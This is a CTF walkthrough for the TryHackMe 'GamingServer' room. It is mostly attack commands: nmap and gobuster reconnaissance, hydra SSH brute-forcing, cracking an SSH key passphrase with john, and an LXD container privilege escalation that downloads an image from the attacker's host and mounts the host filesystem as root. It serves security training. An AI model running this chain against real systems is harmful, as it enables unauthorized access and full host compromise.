GamingServer

Room Link: https://tryhackme.com/room/gamingserver

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

SSH port 22

Tried bruteforcing ssh with johns username and the dictionary file we found but it didn't work

Kali

hydra -l john -P dict.lst ssh://$VICTIM

TCP/80 - HTTP

SSH port 22

After finding the key I bruteforced that with the dictionary list found

Kali

chmod 700 secretKey
/opt/john/ssh2john.py secretKey > id_john.txt
john --wordlist=/root/dict.lst id_john.txt 

Kali

ssh -i secretKey john@$VICTIM
Password: letmein

Privilege Escalation

Followed this link on lxd privilege escalation

Link: https://www.hackingarticles.in/lxd-privilege-escalation/

Victim

id

Kali

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81

Victim

cd /tmp
wget http://10.10.73.204:81/alpine-v3.18-x86_64-20230712_1453.tar.gz
lxc image import ./alpine-v3.18-x86_64-20230712_1453.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id